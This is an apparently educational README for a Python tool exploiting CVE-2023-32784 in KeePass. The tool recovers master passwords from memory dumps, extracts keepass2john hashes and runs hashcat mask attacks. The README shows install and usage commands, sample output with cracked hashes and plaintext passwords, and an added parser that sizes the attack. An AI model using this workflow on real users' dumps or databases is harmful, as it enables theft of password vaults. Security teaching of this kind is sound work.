## https://sploitus.com/exploit?id=531DA6D8-6CE6-5EA2-9115-23DABABEBA70
# EXPLOIT_KEEPASS
A Python console program that **exploits the security vulnerability CVE-2023-32784** in the password manager **KeePass**.
This exploit reconstructs the master password in plain text based on memory dumps (.DMP).
The program was created as part of my training at the Developer Academy and is used exclusively for teaching purposes.
## Table of Contents
1. [Technologies](#technologies)
1. [Getting Started](#getting-started)
1. [Usage](#usage)
   * [Program Options](#program-options)
   * [Program Flow](#program-flow)
   * [Example Run](#example-run)
## Technologies
* **Python** 3.12.2
* **argparse, subprocess, os, concurrent.futures (ThreadPoolExecutor), typing** (standard library)
* **python-dotenv** [More Information](https://pypi.org/project/python-dotenv/)
  * Reads key-value pairs from a .env file and can set them as environment variables.
* **keepass2john** 1.9.0 [More Information](https://www.openwall.com/john/)
  * Extracts hashes from encrypted KeePass database files.
* **hashcat** 6.2.6 [More Information](https://github.com/hashcat/hashcat)
  * The world's fastest and most advanced password recovery utility.
## Getting Started
0) [Fork](https://docs.github.com/de/pull-requests/collaborating-with-pull-requests/working-with-forks/fork-a-repo) the project to your namespace if you want to make changes or open a [Pull Request](https://docs.github.com/de/pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/about-pull-requests).
1. [Clone](https://docs.github.com/en/repositories/creating-and-managing-repositories/cloning-a-repository) the project to your platform if you just want to use it:
   ```bash
   git clone git@github.com:SarahZimmermann-Schmutzler/exploit_keepass.git
   ```
1. Install the **dependencies**:
   * Create a **Virtual Environment (Venv)** in the project folder:
     ```bash
     python -m venv env
     ```
   * **Activate** the Venv (the directory is `env`, as created above):
     ```bash
     source env/bin/activate  # Linux
     env\Scripts\activate     # Windows
     ```
   * Install the **dependencies** from [requirements.txt](./requirements.txt):
     ```bash
     pip install -r requirements.txt
     ```
1. Install the programs **John the Ripper** (**keepass2john** is part of this suite) and **hashcat** if you haven't already:
   * Linux/Ubuntu (both `apt` commands need root, hence `sudo` on each):
     ```bash
     sudo apt update && sudo apt upgrade
     sudo apt install john hashcat
     ```
   * Windows:
     * [Download](https://github.com/openwall/john) John the Ripper
     * [Download](https://hashcat.net/hashcat/) hashcat
1. Configure a `.env` file with the path to your hashcat directory:
   ```bash
   HASHCAT_PATH=C:\Users\Path\To\hashcat-6.2.6
   ```
   * If your **hashcat** version **runs globally**, you have to **remove** `cwd=HASHCAT_PATH` in code line 244 before using the program.
## Usage
* For the following commands, navigate to the directory you cloned **Exploit_KeePass** into.
### Program Options
* To see all available **program options**, have a look at the help section:
```bash
python exploit_keepass.py -h
# or
python exploit_keepass.py --help
```
| Option (Long) | Short | Description | Required? |
| ------------- | ----- | ----------- | --------- |
| --help | -h | Get a list of the **available options** | no |
| --directory | -dir | Directory containing **.kdbx and .DMP file pairs** | yes |
### Program Flow
* Lists the .kdbx and .DMP files in the specified directory.
* Maps each .DMP file to its corresponding .kdbx file.
* Extracts partial master passwords (missing the first two characters) from the .DMP files using a customized version of **keepass-dump-masterkey**:
  * [Customized version](./my_poc.py): The first two characters of the master password are cut off.
  * [Original](https://github.com/matro7sh/keepass-dump-masterkey): The first character of the master password is missing and the second is a guess.
* Extracts hashes from the .kdbx files using the **keepass2john** tool.
* Links the partial master passwords with the .kdbx files based on their mapping.
* Performs a mask attack with **hashcat**, using a mask that tries all possible character combinations for the first two positions, to reconstruct the full master passwords.
* Saves the results (cracked passwords) in cracked_passwords.potfile in the hashcat directory.
### Example Run
* To crack KeePass master passwords using .kdbx and .DMP files, use the following command in your terminal:
```bash
python exploit_keepass.py -dir [path/to/directory/with/kdbx-DMP-files]
```
* The content of the directory should look like this:
```bash
test1.DMP
test1.kdbx
test2.DMP
test2.kdbx
...
```
* It will yield the following **output**:
```bash
All kdbx-files and DMP-files listed.
Files successfully mapped.
Masterpassword-Extraction successful.
Hash extraction completed.
Dictionary that connects Hashes with their incomplete passwords is built.
[+] Start hashcat for dumps\test1.kdbx with mask: ?a?a25U7L559Sa!U
$keepass$*2*60000*0*87137babe126e080ec0f8fbe1b7a07dff10d480273fe622266338836071707e7*cb0077647e229d549feb79ce3cdafcc3e68b53dc84f18edf0c840710fa255660*78b067b8e7edde33f7927c82b9781098*d4b3a2dd156946173d81b61f89c602857f8d594e022f1ed8850abf0cd275eaff*1470f4d5ada79f3400fe72fa011d07e88c98a7920d88ff6f18af35e344603bf3:sD25U7L559Sa!U
[+] Start hashcat for dumps\test2.kdbx with mask: ?a?aCu897QLIKGE6E.
$keepass$*2*60000*0*5c33f9f1caf38baa9a20106083a0acc3cfe7e6b6d5c98b9c52e63d9507cfca75*8d8a4e6ac3d08ef2ec15ee542fe5df8d6fb703f5e4c58256650c79332d25c8e7*6ce2ba1dd28bcf3e86996fcec8e172c2*0ab826ff50b019f13579199e40b4340f06792b8b094092a07f5456102d493168*98038fe620dd4b781a48560d61d53f51e462dbd8b8e8e9405970e019cccda7cd:HJCu897QLIKGE6E.
Cracking completed. Results saved in cracked_passwords.potfile.
```
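As an added example (not part of this repository), the following Python parses the `$keepass$*2*...` lines that keepass2john produces and the `hash:password` lines of the potfile shown above, checks the hex field lengths, and sizes the `?a?a` mask attack from the Program Flow: with only two characters missing, hashcat tries at most 95² = 9025 candidates. The field names follow john's keepass hash format; the sample line is constructed, not a real database.

```python
"""Parse keepass2john hash lines and size the mask attack the README describes."""
from dataclasses import dataclass
from typing import Dict, Optional

# Byte length of each hex field in a '$keepass$*2*' line, in the order keepass2john
# emits them for a KDBX 3.x database (names follow john's keepass format).
FIELD_BYTES = {"master_seed": 32, "transform_seed": 32, "encryption_iv": 16,
               "expected_start_bytes": 32, "first_encrypted_block": 32}
HASHCAT_ALL = 95  # size of hashcat's ?a charset (?l?u?d?s)


@dataclass
class KeePassHash:
    rounds: int               # key-transformation rounds (60000 in the README's output)
    algorithm: int            # cipher selector field as written by keepass2john (0 above)
    fields: Dict[str, str]
    plaintext: Optional[str]  # set only for potfile lines of the form hash:password


def parse_keepass_hash(line: str) -> KeePassHash:
    """Validate a keepass2john line (or a potfile line) and split it into fields."""
    hash_part, _, plaintext = line.strip().partition(":")
    parts = hash_part.split("*")
    if len(parts) != 9 or parts[0] != "$keepass$" or parts[1] != "2":
        raise ValueError("not a keepass2john version-2 hash line")
    fields = dict(zip(FIELD_BYTES, parts[4:]))
    for name, hexval in fields.items():
        want = FIELD_BYTES[name] * 2
        if len(hexval) != want or any(c not in "0123456789abcdef" for c in hexval):
            raise ValueError(f"{name}: expected {want} hex chars")
    return KeePassHash(int(parts[2]), int(parts[3]), fields, plaintext or None)


def mask_candidates(mask: str) -> int:
    """Candidates for a mask of ?a placeholders plus literals without '?' (as above)."""
    return HASHCAT_ALL ** mask.count("?a")


def kdf_work(h: KeePassHash, mask: str) -> int:
    """Total key-transformation rounds needed to exhaust the mask against this hash."""
    return h.rounds * mask_candidates(mask)


# Constructed sample in the shape of the README's potfile output; the hex is not real.
SAMPLE_LINE = ("$keepass$*2*60000*0*" + "11" * 32 + "*" + "22" * 32 + "*" + "33" * 16
               + "*" + "44" * 32 + "*" + "55" * 32 + ":xx25U7L559Sa!U")
```

The candidate count depends only on the two missing characters, not on the length of the master password, which is why patching KeePass rather than choosing a longer password is what addresses this issue.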